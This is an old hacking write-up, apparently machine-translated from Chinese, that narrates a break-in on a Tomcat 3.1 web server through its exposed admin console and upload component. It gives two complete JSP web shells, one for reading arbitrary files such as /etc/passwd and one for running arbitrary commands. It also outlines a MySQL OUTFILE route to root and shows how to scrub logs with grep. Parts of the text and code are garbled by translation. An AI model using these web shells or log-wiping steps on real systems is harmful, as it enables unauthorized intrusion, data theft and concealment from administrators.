This article describes how to get freeBSD 4.0 root permissions through the web invading.
The article is mainly based on education. I hope that the viewers do not use some of the methods and procedures in this article to harm the network security.
Author: lovehacker
Contact: lovehacker@263.net
Website address:
http://www.chinansl.com
Copyrights All rights reserved All, allow reprint, but need to maintain the integrity of articles.
A very chance, I saw a website, the page is fresh, very comfortable. The website is developed by JSP, because of personal hobbies, I decided to look at the security of the system.
Telnet www.target.com 8080
Get / chinansl http / 1.1
[Enter]
[Enter]
The result of the return is as follows:
HTTP / 1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server / 3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor = blackdown java-linux team)
Content-Language: EN
Content-Type: Text / HTML
STATUS: 404
I got the name "Tomcat 3.1" of the WEBSERVER. I remember that I have discovered this version of the vulnerability and POST to Bugtrap.
Probably: Through ".." technology can withdraw from the web directory, then:
http:// Target: 8080 /../../../..% 00.jsp (no)
http: // target: 8080 / file / index.jsp (no)
http://tith: 8080 / index.jsp (no)
Http: // target: 8080 / index.jsp% 81 (no)
http: // target: 8080 / index.js% 70 (no)
http: // target: 8080 / index.jsp% 2581 (no)
Http: // target: 8080 / Web-inf / (no)
Well, try it! Tomcat 3.1 comes with a management tool, you can view directory and files under the web, and you can add context. Try:
Http: // target: 8080 / admin /
The administrator did not delete or disable access to this directory :-( mistake !!!!!
Then I click on the "View All Context" button, list some of the files and directories in the web directory, I started carefully, a small party, discover a component of the upload file, 嘿嘿, write a JSP The file gets up.
After a few mouthfuls of coffee, I wrote such a Dongdong:
<% @ Page Import = "java.io. *"%>
<%
String file = Request.getParameter ("file"); string str = "";
FileInputStream Fis = NULL;
DataInputStream DIS = NULL;
Try {
FIS = New FileInputStream (File);
DIS = New DataInputStream (FIS);
While (true) {
Try {
Str = disp.readline ();
} catch (exception e) {}
IF (str == null) BREAK;
Out.print (STR "
");
}
} catch (ioexception e) {}
%>
Upload this JSP to the other party's web directory by uploading the components, then:
HTTP: // Target: 8080 / upload / test.jsp? file = / etc / passwd
Hey, password coming out. I only watched "/ etc / passwd" and didn't look at "/ etc / shadow" because it considers WebServer usually started using Nobody's identity. (Mistake)
The next process is bored to guess password, no success. Forget it, then I will only have a point, anyway, now I am equivalent to having a shell, I can't guess the password, then I've Ie is my shell environment!
Write again:
<% @ Page Import = "java.io. *"%>
<%
Try {
String cmd = Request.getParameter ("cmd");
Process child = runtime.getruntime (). EXEC (CMD);
InputStream in = child.getinputstream ();
INT C;
While ((c = in.read ())! = -1) {
Out.print (CHAR) C);
}
In.Close ();
Try {
Child.waitfor ();
} catch (interruptedexception e) {
E.PrintStackTrace ();
}
} catch (ioexception e) {
System.err.Println (e);
}
%>
Then I upload this JSP through UPLOAD, oh, I have a shell now.
http: // target: 8080 / upload / cmd.jsp? cmd = LS -LA /
(I am not listed here)
How to get root? After some search, I found the system installed mysql and I got my mysql password from JSP :) Take a look at MySQL running.
http: // target: 8080 / upload / cmd.jsp? cmd = ps aux | grep mysqld
display:
Root 87494 0.2 1.9 17300 4800 P0- S 28JUN01 5: 54.72 / usr / local / data / mysql
Oh, there is a way, the system is running with root, I know my mysql password, then I can write a shell program, let it create a table, then put my data in the table, then Use the "Select ... INTO OUTFILE" approach to create a file on the system, let the user run my program when executing Su. (Remember that apache.org was invaded? Hacker used this approach). Then, I will upload the program, run, get Nobody permissions, and then ... When using su root, the setuid shell created to make yourself a root.
Oh, it is a good way, I am proud of my idea ...
The next thing, almost didn't make me vomiting:
I knocked one:
http:// Target: 8080 / upload / cmd.jsp? cmd = id
display:
UID = 0 (Root) GID = 0 (XXX) Groups = 0 (XXX), 2 (XXX), 3 (XXX), 20 (XXX), 31 (XXX)
Kao, my web shell is the root, really obeying the administrator, and also served himself. It turned out to toss for so for such a day, hehe!
Http: // target: 8080 / upload / cmd.jsp? cmd = ps aux
Sure enough, root is running (not listed)
The remaining things:
1. Delete my telnet record.
2. Delete the log of HTTP.
As for the clear log, I use the way is: CAT XXX | Grep -V "IP" >> Temp then covers TEMP to the log files that I have modified by I.
I didn't replace his page, because I was not a hacker itself, it's not a red guest, just a network safe enthusiast. So, the email tells system admin!
Of course, I will mention it in the letter that if I need AIL information technology to provide safe service for him, we will be very happy!
